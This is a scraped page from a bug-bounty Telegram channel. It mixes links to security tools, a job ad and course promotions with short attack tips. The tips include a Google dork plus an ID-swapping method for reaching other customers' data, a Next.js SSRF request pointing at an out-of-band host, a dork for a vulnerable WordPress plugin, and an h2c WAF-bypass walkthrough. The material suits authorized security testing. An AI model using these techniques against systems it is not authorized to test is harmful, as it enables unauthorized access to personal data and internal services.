Brut Security
14.6K subscribers
907 photos
73 videos
287 files
962 links
โœ…Queries: @wtf_brut
๐Ÿ›ƒWhatsApp: wa.link/brutsecurity
๐ŸˆดTraining: brutsec.com
๐Ÿ“จE-mail: [email protected]
Download Telegram
Hey Hunter's,
DarkShadow here back again, just dropping a list of queries.

30K+ Search Queries ๐Ÿš€
(Google | Shodan | FOFA)

For hunters, red teamers & OSINT warriors:

โšก Hunt faster
โšก Spot misconfigurations instantly
โšก Scan the global surface with precision

GitHub โ†’https://github.com/projectdiscovery/awesome-search-queries

Show your love Guy's โค๏ธ

#bugbountytips #osint
๐Ÿ”ฅ11โค7๐Ÿ‘5๐Ÿ˜ฑ4
Weโ€™re looking for a talented Full Stack Developer with strong MERN stack skills and hands-on experience in cloud deployment, CI/CD, DevOps, and DevSecOps.

What youโ€™ll do:

1. Build and maintain frontend & backend applications
2. Deploy to cloud (AWS/Azure/GCP)
3. Set up and manage CI/CD pipelines
4. Implement DevOps & DevSecOps best practices


What weโ€™re looking for:

1. MERN stack expertise (MongoDB, Express, React, Node)
2. Cloud deployment experience
3. CI/CD, Docker/Kubernetes knowledge
4. Familiarity with DevOps & DevSecOps principles


Experience required:

1. Minimum 1-2 years in IT infrastructure management, development and implementation.
2. Also expertise in git & github actions


โœ…Send Resume [email protected]

๐Ÿ“Remote, Preferably Kolkata, India ๐Ÿ‡ฎ๐Ÿ‡ณ
โค6
Please open Telegram to view this post
VIEW IN TELEGRAM
โšกAutoswagger is a command-line tool designed to discover, parse, and test for unauthenticated endpoints using Swagger/OpenAPI documentation. It helps identify potential security issues in unprotected endpoints of APIs, such as PII leaks and common secret exposures.

โœ…
https://github.com/intruder-io/autoswagger/
โค14๐Ÿ‘9๐Ÿค1
A fresh Web Pentesting batch with a Bug Bounty approach is starting this week.

๐Ÿ“ฑ If you're interested DM on whatsapp- wa.link/brutsecurity
๐Ÿ”ฅ1
Brut Security pinned ยซA fresh Web Pentesting batch with a Bug Bounty approach is starting this week. ๐Ÿ“ฑ If you're interested DM on whatsapp- wa.link/brutsecurityยป
โœ… For Faster Info Gathering

nuclei -list targets.txt -ai "Extract page title, detech tech and versions"

nuclei -list targets.txt -ai "Extract email addresses from web pages"

nuclei -list targets.txt -ai "Extract all subdomains referenced in web pages"

nuclei -list targets.txt -ai "Extract all external resource URLs (CDNs, images, iframes, fonts) from HTML"

nuclei -list targets.txt -ai "Extract social media profile links from web pages"

nuclei -list targets.txt -ai "Extract links pointing to staging, dev, or beta environments from HTML"

nuclei -list targets.txt -ai "Extract all links pointing to PDF, DOCX, XLSX, and other downloadable documents"
๐Ÿ‘10โค8
Hey Hunter's,
DarkShadow here back again, just dropping a awesome dork that makes pure bounty!

Unauthenticated Access to Sensitive Customer Data via Google Dorking

โœ…Step to reproduce:

- dork:
  site:*.target.com* "date of birth" ext:pdf
- Check if PDF file exposing customer data.
- Noticed the ID in the URL.
- if By changing the ID, you able to access other data.

Result: IDOR+Sensitive info leak (such as customer data)



Now guys let me know, you are want to know all dorks that make pure bounty?

If you guy's want then show your love, probably i made a tool for automation or post the method.

Follow for More x.com/darkshadow2bd

#bugbountytips #dork #idor
๐Ÿ”ฅ11โค10๐Ÿ‘6๐Ÿซก3
CVE-2025-8085: SSRF in Ditty WordPress plugin, 8.6 ratingโ—๏ธ

The vulnerability allows attackers without authentication to make requests to arbitrary URLs.

Search at Netlas.io:
๐Ÿ‘‰ Link: https://nt.ls/HthP0
๐Ÿ‘‰ Dork: http.body:"plugins/ditty-news-ticker"

Read more: https://wpscan.com/vulnerability/f42c37bb-1ae0-49ab-bd81-7864dff0fcff/
๐Ÿ‘8๐Ÿค1
Hey Hunter's,
DarkShadow here back again, dropping a critical SSRF ๐Ÿ’ฅ

Nextjs SSRF in Middleware header!
โœ…POC:

GET / HTTP/1.1
Host: target. com
Location: https://oast. me
X-Middleware-Rewrite: https://oast. me


If you guy's really enjoy to read, then show your love and follow me x.com/darkshadow2bd

#ssrf #bugbountytips
๐Ÿ‘18โค14๐Ÿ”ฅ4๐Ÿ—ฟ1
Bug Bounty Checklist.pdf
149.5 KB
๐Ÿ”ฅ21๐Ÿ‘6โค5
Hey Hunter's,
DarkShadow here back again!

Check your burp isn't this feature is enable?

Most of hackers miss this thing. So, this is a great opportunity to make bounty using this burp feature.

#bugbountytips #burp
1โค8๐Ÿ‘7๐Ÿ‘4๐Ÿ”ฅ2
๐Ÿชฒ Bug Bounty Pro Tip: #H2C Upgrade Bypass

Target: Applications using HTTP/2 Cleartext (h2c) upgrades.

The Core Idea: Many Web Application Firewalls (WAFs) and reverse proxies process HTTP/1.1 but fail to correctly inspect traffic after it's upgraded to HTTP/2.

How to Test:

1. Find a target that accepts an Upgrade: h2c header (common in Java, gRPC, and some reverse proxies like Nginx).

2. Send an initial HTTP/1.1 request with the upgrade header:

GET / HTTP/1.1
Host: example.com
Upgrade: h2c
Connection: Upgrade

3. If the server agrees (responds with HTTP/1.1 101 Switching Protocols), the connection is now HTTP/2.

4. The Bypass: Craft and send malformed or smuggled HTTP/2 frames (e.g., with the :method header set to GET or POST). The downstream WAF may not parse this, allowing you to access internal endpoints or bypass security controls.

Why it works: The security boundary often only exists at the HTTP/1.1 layer. Once upgraded, your HTTP/2 traffic might be forwarded directly to the backend without inspection.

#BugBounty #Hacking #WebSecurity #WAFBypass #HTTP2
1๐Ÿ”ฅ29โค14๐Ÿ‘5
dON'T fORGET tO gIVE rEACTIONS
โค26๐Ÿ”ฅ6๐Ÿ˜4๐Ÿ—ฟ1
โšกSn1per - Automate your recon like never before!

โœ… https://github.com/1N3/Sn1per
๐Ÿ”ฅ19โค9๐Ÿ˜ฑ2
โšกS3Scan - A powerful S3 bucket security scanner designed for penetration testing and bug bounty hunting. This tool automatically detects misconfigurations and security vulnerabilities in AWS S3 buckets.

โœ…https://github.com/KingOfBugbounty/s3tk
๐Ÿ‘20โค6๐Ÿ‘จโ€๐Ÿ’ป2
Mobile Hacking Bug Bounty.pdf
4.4 MB
Mobile Hacking Bug Bounty: The Practical Checklist
1๐Ÿ‘18๐Ÿ”ฅ10โค2๐Ÿ‘2๐Ÿณ1